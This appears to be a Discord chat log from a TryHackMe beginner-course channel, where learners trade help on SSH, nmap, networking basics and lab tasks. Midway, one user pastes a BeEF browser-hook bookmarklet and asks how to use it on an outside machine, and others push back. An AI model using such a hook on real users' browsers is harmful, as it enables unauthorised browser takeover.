#pre-security-legacy-path

you have to remember that to send traffic somewhere you need an IP, but instead of knowing millions of IP's we use the A Record to tie a name to the IP

Ok now i get it thanks!

I don't understand, the OSI model room doesn't have Layer 8 topics? 😉 lol

A good way for remember the OSI model is this. “Please Do Not Throw Salami Pizza Away” — bottom to top reminder.
“All People Seem To Need Data Processing” — a top-to-bottom reminder. I hope this helps

shadow goes with "please do not trust service people anyway"

Oh no I am sorry, I know the OSI model, I was checking out the new courses. I just made a layer 8 joke

ID10T error joke lol

Programmers Do Not Throw Sausage Pizza Away

I used to know a dirty one too but I can't remember now. lol

or the fun one:

people don't need those stupid packages anyway

lol

helps you with remebering udp to a degree

https://tenor.com/view/throw-yeet-recording-gif-14308236

UDP Packets

pre-security done. Moving on, this is so exciting! CySec is really, really huge!

Hello, as a complete beginner, I had just enrolled in "Starting Out In Cyber Sec" room and there in task 3 and 2 there are links that link to "Detect Attacks Using Splunk" and "Analyse Memory To Trace An Attackers Actions Using Volatility" etc for practical hands-on experience. Should I like complete those now itself? or like wait for tomorrow to complete?
#pre-security-legacy-path

leave them for now I would say

In "How websites work" in task 3 and 5, I have zero idea what the flag is/should be. There is no logic to those two tasks in according to providing a flag. I have done explicitly as written, but I dont see any way a flag would show - or any guidance to what the flags should be.

Thank you @drowsy coral

Gave +1 Rep to @drowsy coral

In "Putting it all together" no flag is showed at the end of successfully completing the quiz

Hi. I was checking the "new" room (I was not on THM since 3 months, didn't see it yet), on Linux Fondamentals part2, there's a wrong screenshot in task 5. After the sentence "The diagram below is a great representation of how these permissions can be translated", the screenshot is for the next part. about switching between users, instead on listing the read/write/execute permisions. Hope it helps

Hi, I'm in task 1 intro to Lan and I couldn't find the flag for this interactive lab. Can someone pls help me out?

Like, I'm done with a ring topology and bus topology, but I couldn't able to go further from here.

Am I missing something or doing something wrong? Pls someone correct me. I'm new here 😦

Sorted 👍

Hi Vishal. For the bus topology , it is indicated in the previous messages that it is necessary to overload the network to make it fall by sending as many packets as possible (as this typology is not optimized, each packet will knock at all the doors until finding the good recipient).

Hello Evermore, if you have had help please ignore me. Task 3, you need to input the script within line 9 and then click the button on the top-right of the site "Render HTML+JS Code" Then you should get an output message on the browser for the flag.

As the question asks you: add JavaScript that changes the demo element's content to "Hack the Planet"

You should get the output relatively easily, just take your time with the tasks as overloading yourself with information may burn you out 😄

Task 5, I had a problem with. I think I suggested it to the THM team, as the use of the "enter" button on your keyboard doesn't like it. Write your code within the "What's your name?" and physically click the button "say hi".

This seems like a big spoiler

edited, sorry James

Hi, in enumerating telnet normal nmap scans not working. Can anyone guide me which option to use

Scan from 1000 to 9999 if you want a fast scan

You know it's 4 digits long

hey guys

pls help me asap

I am stuck at Windows fundamentals part 1 at task 6 last question

“What is the account status?”

WHAT IS THE ANSWER COS I LOOKED N I LOOKED AND I CANT FIND IT

😭😭

Thanks completed the scan

Gave +1 Rep to @warm epoch

It is specified under the name of the account you found in question 1

Thank you 💗

Thanks man, this was a real help in memorizing the OSI layers. Mnemonics are great.

Gave +1 Rep to @stiff harbor

Hi MrFernze
I see that it actually is broken.
When this is done in Chrome, an error occurs: "howwebsiteswork:1 A different origin subframe tried to create a JavaScript dialog. This is no longer allowed and was blocked. " So the task is broken, and will only work on certain browsers. I know that many in the community might not like Chrome, however on a learning page like this, it seems broken that a specific task wont work on chrome.

and same problem on task 5.

@cyan forum I use chrome, I didnt have any issues for me. No clue...

hello I am not rly sure if this is even the correct channel to ask that, but can someone explain ssh to me, i know its like on port 22 and is used to remotely do stuff, but... does port 22 need to be open on the device im connecting to? device im using? im like trying everything and nothing seems to work (also trying to connect to my other pc in the same network, not sure if the ip is even correct but i think so lmao)

and also can u do the stuff without using the attacker box and instead using your own terminal to connect to the thing

and if yes how

@zealous horizon If u want to connect to a device using ssh, that device must have the ssh service running (mostly on port 22) and that port would be open. If u just need to connect to a device with ssh, port 22 on ur device doesn't need to be open. Ports are open when a service is running specific to that port.

If the other pc in ur network has ssh running on port 22 then u must be able to connect to it. If not u might be using the wrong password/username/IP of the target device. Both in windows and linux the ynatx to connect to ssh is 'ssh (user)@(host_IP)'. U can do this out of attack box too. For more info : https://www.hostinger.com/tutorials/ssh-tutorial-how-does-ssh-work and https://phoenixnap.com/kb/how-does-ssh-work.

At 27 percent for pre security!

Hi, I’m on VPN basics. It says « VPN that logs all of you data/history is essentially the same as not using a VPN in this regard ». The question is why then to use VPN if there is no anonymity? And the traffic can be tracked?

There's something called a "threat model". It describes what threats you're including and ignoring, who they are, etc.
If you're worried about say... someone stealing information on an unprotected wifi network with http sites then a VPN is great

Ok, great. Thank you very much!

Gave +1 Rep to @warm epoch

Hello Everyone! Just joined THM and this Discord Server, really excited about starting my Journey in Cyber Security, although I am a Complete Beginner, I hope to learn something of value everyday, let's begin! 😇

Windows fundamentals is so dull

in Linux fundamentals 3, general /useful utils, after launching the server, my machine just sits there...

am i missing something, did i not read something?

so lost lol

Hello everyone. I have a question. I just completed the pre security path and im wondering if i can use it as ceu's for CySA+

or maybe i need to do the defensive path

?

Hi, in the Windows Fundamentals 1, what's the answer please for:
Besides Clock, Volume, and Network, what other icon is visible in the Notification Are?: (2 words with 6 letters each), I can't find it. Thank you in advance.

All you have to do is right click the bottom right icon and your answer should be there.

The notifications icon

Thank you!

Gave +1 Rep to @mint flower

I wouldn’t post the answer. But I’m glad you found it!

No problem!

ok, i delete it

Pre-Sec what’s up?

Pre-Sec path finished today!!! 🎉

Congrats!

Thanks!..can’t wait to go the next path 💪

Just finished off the OSI module. 🙂 Im just starting software dev and found the TCP UDP pretty cool. I am of course wondering what the quality assurance code would look like and such as a noob. Eye opening.

Hi guys, asking for some help regarding xfreerdp on mac, I'm not able to get it to work, so any advice or writeup?

Thanks

I Just reached there too

I'm very new so it was all really interesting!

hey all anyone up to Windows Fundamental 2?

finding it hard to find out any of the questions tbh

one example is below, Im stuck i have spent few hours on google i can find anything

What is the command for Windows Troubleshooting? *.*********. / . << that is apparently the answer lol

Open up 'System Configuration' and in the 'Tools' tab look for a tool related to troubelshooting. If you click that it will display the command.

Hey Serpente thanks eventually found it thanks 👍

Hey guys,
In one of the lab they have showed how MAC spoofing works but they didn't show how to spoof MAC ?
Does anyone know about this ?

Google does

😆

"Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?"
Could anyone explain to me what exactly I am supposed to do?

what part of that are you having trouble with exactly?

i got it now, sorry I'm just a bit slow in this.

no problem, glad you got it. for most of the pre-security rooms the answer should be in the text associated with the task 😄 gl!

I need help, I have restarted it and terminated but nothing is working with Linux pt3 it keeps on denying me access what should I do?

!docs verify

Follow those steps, show screenshots
We can't see your screen, we don't know what you're doing so we can't really help

level 4 subscription premium

Your syntax is incorrect

Look at what it's trying to do

It's trying to log in as root@tryhackme

not tryhackme@ip

so I have to type in ssh tryhackme@ip ?

So sorry I am quite new to all this I truly apologize for the inconvenience

thank you so much I really appreciate it.

Hi, I’m in “Extending your Network” task 6 : neither my iPad nor my Mac computer allow me to send any packet in the Network Simulator

Now using a windows pc everything went fine. What should I do to make it work on Apple? Thank you

hey I am having issues with the how websites work room. I have done all the exercises and I got them all correct. But it is not giving me the complete signal. Has this happened to anyone else ?

all good I worked it out

im stuck on question 8 of the windows fundamentals 1 "What is the last setting in the Control Panel view?

@ocean raven Please don't post answers

Guide them towards the answer with help, don't spoil it by dumping the answers

Oh ok. When I had problems yesterday nobody could help. But to delete answers you’re fast. 👍🏼👍🏼👏👏 The active machines are so frustrating: super slow, often won’t let me click or write where I should and won’t work on my Apple devices. Any help on that?

Make a Kali VM and use that?

I’m a total beginner starting from zero. If I knew how to do that easily I wouldn’t be here?

Post in #site-bugs if the site is behaving differently on MacOS

okay I will post the bugs as well. But yes they can be slow.

hello, I have a little problem

Explain it directly

https://dontasktoask.com

I was just occuped it is for that I can’t finish my sentence

Sorry my guy

wsp.

I've done 2 rooms so far. Do I need to subscribe to do the pre sec course or is it free?

you only get the free parts of the course, if u want full access to the course than u subscribe

Ok understood. Thanks

Gave +1 Rep to @near bane

Woot Just finished this path 😀

Congratulations! What are you moving on to?

What path should I do next after pre security is complete? Is there any recommended order for paths?

I think compteA is a good path

I would say the complete beginner path will be a good one to follow up with, but obviously it's up to you, but some other paths will be more advanced 🙂

yes i agree on that too

Cheers it’s what I thought too

Not a problem, also the advent of cyber rooms are pretty cool. They include beginner friendly stuff and kind of a little bit of everything.

sincerely, i just finished pre-security me too but i dont feel like i can do something, do i need to practice or with time in learning paths i will develop my abilities. some advice plz

The learning paths will allow you to learn and practice.

At the very beginning is normal to feel overwhelmed.

Ye, the pre security path is just a very very basic thing, so by simply doing that you won't be able to do much, there has to be much more practice and knowledge. So just keep on going with other paths, like the complete beginner one, even there you might be stuck sometimes, but your first approach should always be to google it. If you still not able to understand or find the solution, the THM community is a great place to ask for help.

Will do

I’m actually going to do the Complete beginner path next

I’m right behind you! Good luck.

I'm having some issues with task n4 in linux fundamentals 2

can only open the attack box and not the deployable machine

Have you started the machine (task 2), then tried to ssh from the attack box?

there we go, forgot that detail, thanks!

Gave +1 Rep to @runic turtle

Hey

hi

Yo

@hazy rose @neat glade get verified first !docs verify

!docs verify

Here u go

Hey i've got a question

Hello, I'm having an issue getting the python3 HTTPServer to open in linux fundamentals 3, task 4.

this is what I get after I connect by ssh to the VM

Yep, it's working

ok so I can put in my command to download the file and it will work?

oh wait you might be starting that webserver on the wrong machine or trying to download it from the wrong one

You need to type the command into a new terminal window. Currently, the http server is running from that window so you can't input anymore commands there until you stop it

Awesome thank you

Gave +1 Rep to @median mica

Np

Are there any teams I can be a part of >>?

^same, looking for one too, would be pretty cool

same here

hello

hi

Hi !
I'm on the part 2 of the Linux Fundamentals, the task 2
But when I run the SSH command, i'm unable to enter the password, when I type it on my keyboard.

Typing is hidden 😉 Just enter password and confirm with enter.

Oh, thanks ! 😄

smh, does this happen with everone😂

samething happened with me in my first time lmaoo

Hey I got a question about networking. What does it mean when a subnet mask is 255.255.224.0? Why isn’t it just 255.255.255.0? Any help or info would be super appreciated. Thank you!

It means it's not a /24 network. If the subnet is 255.255.224.0 then it's a /19 network. Meaning there are more hosts on it.

ok thank you @median mica

Gave +1 Rep to @median mica

outside of the obvious, (i.e. the name of the room) whats this place all about?

im trying to learn all I can and this place sounded like a reasonable place to start

Pre security is the pathway designed for people who want to get into CyberSec but don't have the comouter/networking background requires. You'll learn basic networking concepts, basic web concepts, and well as an in depth explanation of how the windows and Linux Operating Systems work

It will give you the required foundation to enter the Cyber Sec field

hello, i have a question. network-services -> Enumerating telnet -> for the answers a backdoor and Skidy. is there any other way to get those 2 results in an nmap scan without doing a full scan. i have tried watching youtubers and all of them either did a full scan or they searched online to get those 2 answers. i also tried different nmap commands and i can't get this as a result... all i get is "8012/tcp open unknown"

Can you send the Nmap command you used?

i tried the following nmaps : nmap -sT, sU, sS also sX but always limited to around 10 ports like -p 8010 - 8020

yesterday i did a full scan [nmap -A -sV -p- IP] of all the ports and it took me 1h:34min so i would like to be time efficient today and try to improve while i learn

Well, if you know what port you're looking for you can run a detained scan on that port alone. Nmap allows you to pick a specific port if you want to

You'll want to use the -A flag

And I usually use -T4 to speed the scan up a bit

thank you joker, this worked, nmap -A -sV -T4 -p8012 [IP]

Np

Is it just me or does the Linux Part 2 Permissions 101 really disconnected? It keeps referencing a lot of stuff that isn't in the pre-security-pathway or the previous Linux parts.

Ot should be trying to teach you new things

If there's something you don't understand, Google it

That's the go to for most advanced things too so it's a good habit to get into

ok thank you @median mica

Gave +1 Rep to @median mica

hi, i have a link that can connect to your system

but im not sure how to use it in my windows machine someone can help

?

javascript:%20(function%20()%20{%20var%20url%20=%20%27http://0.0.0.0:3000/hook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();

this connects to beef so dont use it plea

se

trying to run it as a js wont work

What exactly are you trying to do?

im trying to access a windows browser outside of the network

Pretty sure that beef is out of scope for this pathway ;)

To what end?

?

i didnt understand you

I mean that sounds dodgy

which can be then?

my own i run kali in vm i wanna hack this browser

Still sounds pretty dodgy to me

¯_(ツ)_/¯

btw will my ip be diffrent on windows and kali? if yes how do i see them both

Yes

oh, got you

if i reveal my ip adress can anyone do anything with it?

Just be warned that there are very few ethical uses for BeEF, and at your level basically none.

just the ip address

Consider an ip address like a street address

oh

but what about the fact that there can only be 0-225 in a octanet?

there must be more than that in the whole world

In an octet?

yea sorry*

There are 4 billion or so ipv4 addresses in the world. Though some sections are reserved for internal use only

oh,got you

which one will you suggest then?

Notably the 10.0.0.0/8 range, the 192.168.0.0/16 range and another weird one in the 172s

I'm still not sure what you want to do and why

i wanna get into ethical hacking and cyber security ive tried using tryhackme cources but now there just paid

and as of now im trying to look for a way to learn hack windows and access stuff and how can i prevent it

There are plenty of free rooms, I doubt you've done all of them

oh, ill check again but i think there were like 15 or less

There are hundreds

oh

Just a friendly warning, I'd carefully read the #rules and try to avoid contentious topics in the future, as you risk being banned.

@cinder nexus will

Sorry if I'm pinging you, but I guess you're knowledgeable about this. Can anyone after completing the complete beginner path do a room?

What does it take to do one?

You mean create one?

^

This

Like the cat one

Or the others

Oh yeah you can either use the search or the suggestions under the "learn" menu

There are no prerequisites

No knowledge required

?

Though some may be more difficult than others

Knowledge maybe ;)

But no arbitrary locks

I'm very new to linux :(

I guess I'll have to wait a bit longer

Did you do the Linux fundamentals rooms?

Till I can do one

Nope

I just finished studying DNS

Might be a good start then

Appreciate your help

Ty

Hello! This is kinda a basic question but I´ve been struggling with it for over 30 minutes, this is from Windows Fundamentals 1 , module 2:

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

can anyone help having trouble with decentraland on my browser it says WEBGL2

@fickle ember This channel is for the tryhackme pre-security pathway

Right click the bottom right icon (Notifications) and your answer will be there.

You saved my day, thanks!!

Gave +1 Rep to @mint flower

No problem! Happy to help!

hi, need some help for javascript task not sur i'm understand the task

ok i found it but not sur that i really understand

This channel is for the pre-security path. I don’t believe any of the rooms cover JavaScript. What room are you in?

how website work

maybe i need to go on the web-fundamentals-path?

No you are correct. Thanks for clarifying. What do you have a question about? I’ll do my best to help.

Gave +1 Rep to @languid herald

i don't have the logic for web coding it's totaly abstract for me so even if i have the answer ( sorry if my english is quiet strange, i'm not english ^^)

is it fundamentals to know web coding in infosec?

or just a speciality?

Everyone will have a different answer for this question. It depends on what you end up focusing on. If you plan of doing a lot of web testing, knowing the basics of JavaScript can help a lot. Knowing how to read it and figure out what it is doing is important. Knowing a bit of JavaScript can be a really good thing.

i would like to be a pentester so i think is indispensable no?

a lot of people around me told me to learn python

more than java or html5

You should learn some JavaScript. It will come in handy. Python is also a good language to learn. It’s very useful. Luckily THM has a few rooms on Python and it has a room called JavaScript Basics. Run through those rooms and get some scripting knowledge!

thanks a lot man! and well i go now!

No problem!

Hi, I'd like to ask you a question about my problem with the "Linux Fundamentals Part 3" room. At my ssh connection request, inserting username and password "tryhackme" without quotes, the message "Permission denied" appears. Could anyone help me? Everything is correct 😦

i'm trying to connect via attackbox..

What's the command you are using.

i'm stupid, i'm sorry. I've inverted commands. instead tryhackme@IPADDRESS i write IPADDRESS@rain berry

Good to go then?

yes, now it's work. thanks anyway for the support

hello everyone! can someone tell me if in windows fundamentals2 task4 question 2 works? cause i have the good answer but it's tell me that is wrong can someone check please?

What's the answer you entered? Send me a DM with it and I'll let you know if it's correct or not.

Hey everyone

👨‍💻

for most of the presecurity i havent made notes but can memorize most of it, does it matter i dont have any notes, especially as i can go back later to remember

The presecurity stuff isn't particularly hard to remember. However, it's good to get into the habit of taking good notes because as you progress and learn more things you'll need notes to refer to. On top of that, it's just good to get into the habit of documenting everything you do

Which apps you recommend to take notes??

I started off using keepnote however it's very outdated. It's also not supported on Linux anymore if you ever end up swapping to a full Linux system. I like cherrytree which comes installed in kali. I think there's also a windows version for it but I'm not sure

Thank you! I started using One Note, but it have lot of things that just complicates things to me. I´ll be using the one you´re recommending me. Thx!

Gave +1 Rep to @median mica

There are tons out there. What works for me might not work for you. Research and try new things

Hello! I have a question for the Regex room, it was recommended at the end of the Linux Fundamentals. Is that alright for this room?

hello i have a question about the windows fundementals 1 room

regarding a question i'm stuck on

If you would like help, you really need to ask the question outright.

Can anyone tell me the sequence of rooms I should start learning. I have finished some basic rooms like linux fundamentals and nmap fundaments. What should come next?

I would go with paths. So for example start with the pre security path and after that continue with the complete beginner path.

Ok

Can you tell me how to find the ip address of our target?

If there is a target machine attached to the room, then there is a green(not blue) button "Start Machine" and above the tasks a box will appear that looks similar to this:

I am not talking about machines in THM. I am talking about real world targets?

Uhm, you could look up for bug bounty programms.

What is the function of these programs?

Well that's basically companys who allow people to do penetration tests on their web application or other infrastructure (always read carefully on what the scope is) to find vulnerabilities and report it to those companys, where in return you get paid for it or other benefits. But that would be a possibility if you look for real world targets. But there is even a dedicated channel in the THM discord for that, where you might get better informations about that then from me. #bug-bounty

Ok thanks man

You are welcome

I am trying to ping a machine in the same internet network with my kali machine. But it isn't happening. Any suggestion what might be wrong here?

Hello @shadow tiger maybe the machien doesn't accept ICMP (PING) try nmap it with verbose mode (-vv) and ignore ping using -Pn. Quick question though, did you connect to the network via openvpn ?

Hope it helps 🙂

You're probably using virtualbox and they're both 10.0.2.15?

Stick to the path, it take some time to understand the fundamentals of networking…. But the path is sooo good for the start!

all machines does not response to icmp packets. run wireshark and see whats going on. if you want scan, just use -Pn to ignore the ping

Don't do this until you have the network set up correctly otherwise you're wasting time.
Also you should know if it responds to ICMP if you control it.

Out of interest. If we are talking about ICMP Ping, we are talking about the ICMP echo request, right? Or any ICMP request? As my question would be, if a machine doesn't respond to the ICMP Ping (echo request) there is still a chance it could reply to an ICMP timestamp request, right? Or would that mean it doesn't respond to any ICMP request at all?

Ping is an ICMP echo request.

It might not reply to echos.
Something might be filtering all inbound or outbound ICMP traffic (not uncommon)

Oh okay, so that means it most likely filters all ICMP traffic and not only the ping. Thx 🙂

Gave +1 Rep to @warm epoch

Blocking all ICMP outbound means you can't UDP scan effectively

You might be able to talk to a service like DNS but otherwise you're not going to be able to tell what's open

Alright, thanks a lot.

It's worth mentioning that the default windows servwr firewall blocks ICMP from the public zone. THM VPN is marked as public, but AttackBox is usually counter as private zone

So that I understood you correctly, that would mean there is a chance you could successfully ping a machine from the attackbox while you would get no reply when doing it from your own machine while being connected to the THM VPN ?

Correct, try it with the furthernmap room

Will do 🙂

Hi guys

I have a question

in hacking domain

Who here can help me read a firewall log ?

@ember dust What do you need help with?

needed help in how to read a firewall log?

Is this related to the TryHackMe Presecurity pathway?

@elfin star why is this channel aclled #pre-security-legacy-path when all the rest are xyz-path?

I'm in the 'linux fundamentals part 2' room, and I can't connect to the machine.
I'm using the newest kali linux version, and configured openvpn successfully, but it says 'Connection Refused'

wow it worked right after i said that

@warm epoch no

yeah. you need to give the machine a few minutes to boot up and start the services

I'm on the linux fundamentals part 1, task 3. I started the machine. And Received an IP address. I nmaped it and only open port is 22. How am I supposed to connect to this machine without credentials?

Its supposed to open within my browser, but doesn't.

nvm, adblock was blocking the side panel with the machine

Hi, this is my first post here so please be patient and understanding. I'm generally happy with the service (thinking to buy it for our class) ... HOWEVER, while solving this first path I came across a bug/question that is a bit ridiculous compared to the complexity of the full TryHackMe experience. In room "Extending your network", question 1 is "
What layers of the OSI model do firewalls operate at?
"... Aside the complexity of this question for such a beginner room. I was forced to put in "Layer 3,Layer 2" which is what the video shows... AND when coming back to the question I see "Layer 3,Layer 4" as correct answers (as though I HAVE entered that). Soooo... which one is it ? (the correct answer)... I mean... I'm confused myself (I don't claim to know TOO much but still I should be teaching this at a beginner's level). Just saying that WHEN considering to take your subscription and buy it for 15 people - I'm not expecting this kind of "misleads"... Can anyone please assist me with this issue ? Thank you very much !

Depends on the firewall, honestly. I'd say both are valid answers

Answers change and are corrected.
The videos are not updated.
Copying from the video will mislead you where answers have been corrected or updated.

Yeah... the question is just way too complex for a beginner !

Thank you !

Gave +1 Rep to @warm epoch

Hi there, I am doing windows fundamentals room, trying to connect to the machine from remmina with RDP but it isn't connecting. Do I have to access it via OpenVPN?

if you're not using the AttackBox or the web-based Kali/Windows machine to connect to the victim machine, you'd have to connect via OpenVPN

i think the web-based attacker boxes and the machines you spin up in THM are inside the same internal network, which is why you could e.g. directly do nmap scans on victim machines with the web-based boxes

but your own computer couldn't access this internal network unless you connect via OpenVPN

I'm not using attackbox or OpenVPN. I'm going to try. I should have checked.

I'm going to try with OpenVPN

you'd have to pick between either of these two choices so that you could access the victim machines on THM

i personally use both: i've found the AttackBox to be able to do directory fuzzing, hash cracking and nmap scans much faster than my laptop could, whereas my laptop is mainly used for accessing the victim machine's services (SSH, web, FTP, SMB, ...)

Windows Fundamentals 1
Trying to access the machine using rdesktop in Kali.

Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect using NLA, trying with SSL
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).
Can someone help out?

Managed using xfreerdp

So it's working now or not?

Working using xfreerdp /u:[username] /p:[password] /v:[IP].

Alright

How can an admin see regular users' passwords? (I just changed it. )

He usually he can not as far as I know. But if it's regarding that room, the password is somewhere stored in cleartext for that tasks question you are on. But if you said you changed it you might do a different task.

Note: You have the username and password for the standard user. It's visible in lusrmgr.msc.
I can't get to the password of the standard user (tryhackmebilly).

You have to take a closer look, it's stored in the lusrmgr as a comment.

Aahhhh. Changing it was easier. 🙂 Thanks.

Gave +1 Rep to @soft snow

Windows Fundamentals 2:
How do you know that this share is hidden? (Besides having a peculiar name)

Thanks to the community.

Are the youtube video on top of each room the same as the text ?

hi guys I am new to this platform can you tell me what does it mean to be subscribed

every one is talking about getting verified and getting subscribed in bot channel

congratulation @marsh veldt

I appreciate your hard work and effort. Hope you learned a lot from this community.

I also look forward to be a part of it and learn a lot from each other

Well you can access premium rooms for example, as well as that the attackbox isn't limited to 1 hour per day.

But you can also check out the FAQ https://tryhackme.com/faq

so like do I have to pay for it on monthly bases

You have to yes

oh I see

thanks for the info @soft snow

Gave +1 Rep to @soft snow

what is a +1 Rep

very little for the quantity and quality you are getting.

Reputation

ok i guess the Robocop want me to give you a +1 rep 🙂

and how do I do it

It's for saying thanks for example if someone helped you, he will get reputation for that.

I have seriously no idea how to use discord, my apologies

robocop already did, that's what the messages means, so you don't have to do anything.

okay and if I have to do it myself, then how would I do it

Well by saying thanks and either answer to a message from someone or tag him, but tbh that reputation thing is not too important, it's kind of a fun gadget tbh

Gave +1 Rep to @soft snow

okay thanks a lot for clearing that out @soft snow

I got it know 🙂

@soft snow where have you reached in pre security so far

what have you finished lately

Pre sec I finish quite a while ago, lately I finished the jr pentester path

wow that is so great

how do you feel now

did you apply all of the knowledge you learned on real machines

that you get when you subscribe to TryHackMe monthly package

Well I feel that I gained a lot of valuable knowledge which is great 🙂 I have not applied it on real machines yet.

What you mean with "that you get" ?

I think most of the rooms from the jr pentester path are free anyways and you can deploy target machines without being subscriber. These target machines are not limited to 1 hour, it's only the attackbox (so the machine you are attacking the target machines with)

Wow that's great to know 👍

If you set up your own VM with for example kali linux and connected via openvpn, you can just do all of the free rooms without time limitation

Awesome bro 👍

This is what I was talking about earlier

Ok, well ye, it's just the attackbox and "better" vpn servers. I mean it's a very low price for the value of knowledge you get, there are other sites much much more expensive. But as I said, you can do all the rooms that are free without being subscriber and without time limitation too.

hey guys, need your little help. trying to establish my ssh but it just keeps saying "permission denied" whenever I fill in the password. what could be the matter?

password is "tryhackme", isn't it?

Which room? Which task?

linux fundamentals part 3, since the very beginning

Can you quote the command you are using to log in?

ssh tryhackme@10.10.221.17

or any other ips that I had before

Give a screenshot, it could be something else too

having the same issue.
ssh tryhackme@machine_ip

That's the exact command you're using?

Nope. Using the IP of my current machine.

Ok just making sure

Ya never know i guess haha

You'd be surprised how many people make that mistake

I can imagine.

So, just double checking, it's saying permission denied when you try to ssh into a room?

Yep after entering the password

It has for multiple days in a row.

Can you send the link for the room?

Im logged off for now. Will get back to you when I'm back on if that's cool

Yea no worries. I'll be busy most of the day tommorow, but I'm sure someone else will be able to help you. If not, then I'll help you out when I get a chance

I should mention, i successfully logged ssh in the past. I know how to do it but there seems to be an issue.

I think another guy mentioned it above.

Much appreciated man

I think @marsh veldt had the same issue yesterday

it seems like i can't send a screenshot here so I'll just copy my terminal:
root@ip-10-10-7-170:~# ssh tryhackme@10.10.7.170
The authenticity of host '10.10.7.170 (10.10.7.170)' can't be established.
ECDSA key fingerprint is SHA256:bcMHtOOcKrFlorgp2C65LGeywzwI++NiVqXZOmy1U.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.7.170' (ECDSA) to the list of known hosts.
tryhackme@10.10.7.170's password:
Permission denied, please try again.
tryhackme@10.10.7.170's password:

I've tried also using sudo but that doesn't help

You have to verify your THM profile in discord in order to be able to send screenshots

!docs verify

did it, thanks!

Gave +1 Rep to @soft snow

So you solved your issue with ssh meanwhile? As I can already see what the issue is.

Well, in case you haven't, you are using the wrong IP, you used the IP of your own machine(your attackbox) instead of the target machines IP.

ok im stumped on what im doing wrong with my attack box. linux fundamentals part 3, i go to hss tryhackme@10.10 and use the password tryhackme but it's not letting me log into it

keeps saying the passwords wrong

Can you please share the complete command you are entering? (I hope what I see are just some typos here...)

Take a look at @soft snow 's post above. ( #pre-security-legacy-path message )

ye it's fixed now. many thanks for the assistance!

thanks! i figured it out

Gave +1 Rep to @sterile walrus

yep, that was the problem, thanks!

ok so in a typical layout for a home network, is the router both the default gateway and the network adress?

i get that the host adress is the specific device like a computer or something

Router won't be the network address

The network address describes the network, not a device

oh so the entire shibang of devices

Not really

You wouldn't use it to talk to the devices. It's really for writing/describing the network

i get it now

so the host adress is a specific device on a network, a router or switch would be the gateway and it sends and receives stuff to other networks, and the network address is basically saying that a network exists

It makes a lot more sense when you can write it in binary

probably

Switch wouldn't be a gateway.

oh ok

Switches don't route between networks

Unless they're being routers

ok i get it now

so would a switch hold a host adress?

Switches don't tend to have IP addresses unless it's for a management interface.

hi all

someones know how to pass trough this section

https://static-labs.tryhackme.cloud/sites/net-simulator/?config=introtonetworking

seems bugged

with a missing variable

ok seems its from safari navigator

i used another navigator to pass the test

im doing a linux fundamentals pt1 and i dont know how to pass this question

i run the attackbox and everything

but when it asks me to write username of who i'm logged in ason my linux deployed machine

@boreal ether that's the attackbox, not the target machine. Terminate the attackbox, deploy the machine in the earlier task.

i deployed it

Ok, you see the bottom bar on the right?

Click linuxfun...

oooh

thanks for helping

Hey im now in network services 1 and im confused about a nmap command

whenever i want to answer a question like: What variant of FTP is running on it? I cant see it in my console

where I can see on other sites that they get stuff like this

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 353 Apr 24 11:16 PUBLIC_NOTICE.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.54
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: Host: Welcome

what command are they using?

You have the answer there

I know

but i cant get this information on my consule

console

What nmap command did you use?

I used nmap -vv -sT 10.10.73.112 -p-

A few things. 1, you don't need -sT for this. 2, try adding in -A (which will run an aggressive scan. Note this will make the scan much longer so you might want to supply a specific port instead of doing -p-)

You can also use --script ftp-anon to enumerate FTP

ah I got it

thank you

Hey guys, I'm on Linux Fundamentals Pt.3 task4. When I try to wget then the IP address to download the flag.txt it says connection refused. I cannot seem to get it to download the flag text. Any pointers?

!docs verify

follow that

then send screenshots

send the link to the room

plz

https://tryhackme.com/room/linuxfundamentalspart3

Youre missing a step. Youre currently ssh'ed into the target machine. You need to use python to set up an http server right there. Then open a new terminal window and use the wget command

Thank you! I never would have figured that out. I have to do more reading on the python3 command, don't think I fully understand it.

Hi guys I was solving Upload Vulnerabilities Module. But I am unable to install Gobuster using sudo apt-get in the web based Kali Linux provided by TryHackme. It keeps throwing me error. Can someone tell me what to do?

Use the attackbox, it's preinstalled.

Thank you

Gave +1 Rep to @warm epoch

windows fundamentals task 6: what is the name of the other user account

i am stumped as hell and confused cus i did the thing where i go to the other users, all i see is TRY HACK ME which isnt working so i did lusrmgr.msc and tried literally everything that came up listed under users and still got nothing. i swear i'm gonna cry if it turns out i'm just spelling something wrong again when i put it in as an answer

never mind... i was in fact spelling something wrong

If you go into lusrmgr.msc and go into the Users tab, the account name is all the way on the left. The full name is TRY HACK ME but there is a different account name. Are you sure that you are in Windows fundamentals 1? If you are still having trouble the account name is ||tryhackmebilly||

thanks for answering my question. it turned out i was just spelling it wrong in the answer bar though

good ol dyslexia and all that

Okay, I’ve been messing with this far too long. What am I doing wrong here

First of all you are trying to wget it from the target machine, to the target machine. Instead of from the target machine to your attackbox. Secondly you probably didn't start the python server in the correct directory

How to solve this? I can't understood exactly

@wild ledge I think this one's yours.
It's a cron job, not a crontab.
Crontab is the table, which lists jobs

you probably didn’t start the python server in the correct directory

This is why my first attempt didn’t work, thanks for the help

Gave +1 Rep to @soft snow

Are you supposed to have a good foundational understanding of the topic after completing a room? Because I feel like I'm learning so many new topics so briefly I'm going to forget them all tomorrow. Like I just finished the DNS room and if you asked me what a CNAME Record is I'd stare at you blankly. Am I doing the paths wrong?

